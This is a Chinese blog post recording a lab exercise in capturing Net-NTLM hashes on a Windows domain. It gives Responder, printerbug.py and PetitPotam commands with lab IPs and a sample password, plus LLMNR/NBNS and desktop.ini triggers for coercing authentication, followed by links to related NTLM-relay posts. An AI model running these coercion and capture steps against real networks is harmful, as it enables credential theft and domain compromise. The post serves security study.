捕获Net-NTLM HASH 实验

于 2024-10-02 20:07:22 发布
阅读量171 收藏 2
点赞数 5
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ULGANOY/article/details/142684529
版权

1. Responder监听

sudo ./Responder.py -I eth0 -wv

在这里插入图片描述

2. 触发NTLM请求

0x01. LLMNR && NBNS协议

win+R : //asdasdasd

在这里插入图片描述

在这里插入图片描述

0x02. 打印机漏洞

krbrelayx下的printerbug.py:

注意,这个凭据不是DC的,只要是个域用户都可以。@后面是攻击目标,后一个ip是responder的ip。

python3 printerbug.py intranet/win2008:1q2w3eQWE@192.168.72.131 192.168.72.128

在这里插入图片描述

0x03. PetitPotam

这个的话,responder的ip写前面,攻击的目标ip写后面:

python3 PetitPotam.py -d intranet.com -u win2008 -p 1q2w3eQWE 192.168.72.128 192.168.72.131

在这里插入图片描述

0x04. 图标

太多了。。。就记一个desktop.ini的好了。

改 desktop.ini即可:

在这里插入图片描述

然后访问test文件夹,即可触发。

在这里插入图片描述

……

N0zoM1z0
关注
具有Net-NTLM哈希捕获功能的面向Red Team的C#简单HTTP和WebDAV服务器-.NET开发
05-27
一个使用C#编写的面向Red Team的简单HTTP和WebDAV服务器,具有捕获...用法:: SharpWebServer ::具有Net-NTLM哈希捕获功能的面向红队的C#简单HTTP和WebDAV服务器作者:-MDSec的Dominic Chell(@domchell)-Net-NTLM
SharpWebServer:具有Net-NTLM哈希捕获功能的面向Red Team的C#简单HTTP和WebDAV服务器
03-30
一个使用C#编写的面向Red Team的简单HTTP和WebDAV服务器,具有捕获Net-NTLM哈希的功能。 用于为横向移动目的在受损机器上提供有效载荷。 需要.NET Framework 4.5和System.Net和System.Net.Sockets引用。 用法 :: ...
(Net-)NTLM Relay(重放)
Canterlot的博客
09-06 679
详细介绍了 NTLM Relay(ntlm重放)的原理和相关工具的使用方法
浅析域内NTLM Relay攻击
2401_84466229的博客
05-27 957
NTLM Relay是一种中间人攻击的方式,一般而言都是被动攻击,等待连接操作,但PetitPotam的出现,发生了一些改变。正如上面实验,在两台域控都安装了ADCS的情况下,不需要被动等待即可发起攻击。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要。
134-横向移动-NTLM-Relay重放&Responder中继攻击&Ldap&Ews
DamnVanish的博客
08-24 577
一般场景下是配合钓鱼来使用的,毕竟谁会直接命令行进行连接
一文带你了解NTLM Realy 攻击
dzqxwzoe的博客
09-09 266
NTLM Realy 攻击其实应该称为Net-NTLM Realy 攻击,它发生在NTLM认证的第三步,在Response 消息中存在Net-NTLMHash,当攻击者获得了 Net-NTLM Hash 后,可以重放Net-NTLM Hash 进行中间人攻击。NTLM Realy 流程如图所示,攻击者作为中间人在客户端和服务器之间转发NTLM认证数据包,从而模拟客户端身份访问服务端的资源。NTLM Relay 攻击分为两步:第一步是捕获 Net-NTLM Hash;
内网渗透-Responder捕获Win哈希
小刚的博客
08-03 3148
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 Responder捕获Win哈希实验环境Responder安装ResponderResponder参数获取NTLMv2哈希 实验环境 VM搭建的虚拟测试环境 1.被攻击win7主机192.168.1.130 2.kali 192.168.1.131 3.win7配置 netsh advfirewall set allprofiles state off winrm quickconfig winr.
内网渗透——针对hash的攻击
Eagle_pompom的专栏
04-25 1674
0x01 前言 本文从hash获取方式,爆破hashhash中转,中继等方面全面分析,以直观详细的实践来了解攻击过程,过程比较详细,请耐心观看。 0x02 什么是NTLM-hash、net NTLM-hash NTLM hashwindows登录密码的一种hash,可从Windows系统中的SAM文件和域控的NTDS.dit文件中获得所有用户的hash(比如用Mimikatz提取)...
内网域中NTLM中继那些事儿
qq_62169455的博客
06-03 894
Windows的MS-RPRN协议用于打印客户端和服务器之前的通信,默认情况下是启用的。如下图所示,在认证的整个流程中,攻击者充当一个中间人,此时,在客户端的眼中,他就是服务端,而在服务端的眼中,他又是客户端。简单说就是,A登陆了administrator这个账户,我们通过手段拿到A的Net-NTLM Hash后无法直接把这个Hash传递回A,但是如果域内的B也可以通过administrator这个账户登录,那我们可以把从A处获得的Hash传递给B,拿到B处的administrator权限。
NTLM Relay利用
qq_18811919的博客
03-07 3542
讲述了多种NTLM Relay的利用方式包括打印机bug以及PetitPotam强制触发NTLM认证方式以及Exchange Relay与ADCS Relay的利用
Windows内网协议学习NTLM篇之发起NTLM请求
子曰小玖的博客
05-08 1917
0x00 前言 这篇文章是ntlm篇的第二篇,怎么发起ntlm请求。在 阅读这篇文章之前,有两点说明 这篇文章的主要内容是使服务器向攻击者发起ntlm 请求,但是没有进一步利用,因此本篇文件的表述都是获得net-ntlm hash。使用Responder来捕获。Responder的用法可自行搜索。这里不展开。 有些地方较为敏感,因此使用的net-ntlm hash的截图并非真实图片。这个地方...
pass-the-hash-attacks-tools-mitigation_33283.pdf
06-18
这一特性使得攻击者可以通过捕获或窃取用户的NTLM散列,然后利用这些散列冒充该用户的身份进行后续操作,而无需知道原始密码。 #### 攻击过程 1. **散列获取**:攻击者首先需要获取目标用户的NTLM散列。这通常通过...
FreeRTOS列表与列表项
luckyluckypolar的博客
09-29 843
列表与列表项实际上是FreeRTOS中一个大量使用的一种数据结构
新版双向链表,添加了at, front, back, insert, emplace等为了兼容std.
weixin_42944928的博客
09-26 419
【代码】新版双向链表,添加了at, front, back, insert, emplace等为了兼容std.
简单实现log记录保存到文本和数据库
星河队长
09-26 324
简单保存记录到txt,sqlite数据库,以及console监控记录。
单链表插入删除元素
2301_79012058的博客
09-28 618
应该使用。
C++中,如何使你设计的迭代器被标准算法库所支持。
最新发布
weixin_42944928的博客
10-01 460
DListNodeIterator : _DList正向迭代器,继承于。下面是_DList源码,最后修改于2024-10-01。std::iterator : 标准库读写迭代器。_DList :是一个双向链表。
MyBatis<foreach>标签的用法与实践
GDFHGFHGFH的博客
09-26 519
demo1简单的一个批量更新,这里传入了一个List类型的集合作为参数,拼接到 in 的后面 ,来实现一个简单的批量更新</</collection=“allVisible”,allVisible代表传入的集合item=“visible” ,visible代表集合的每一个元素open=“(” 代表以( 开头separator=“,” 代表以“,”分隔,close=“)” 代表以“)”结束本质上这里是个拼接,所有要保证这里list不为空,不然会报错demo2。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值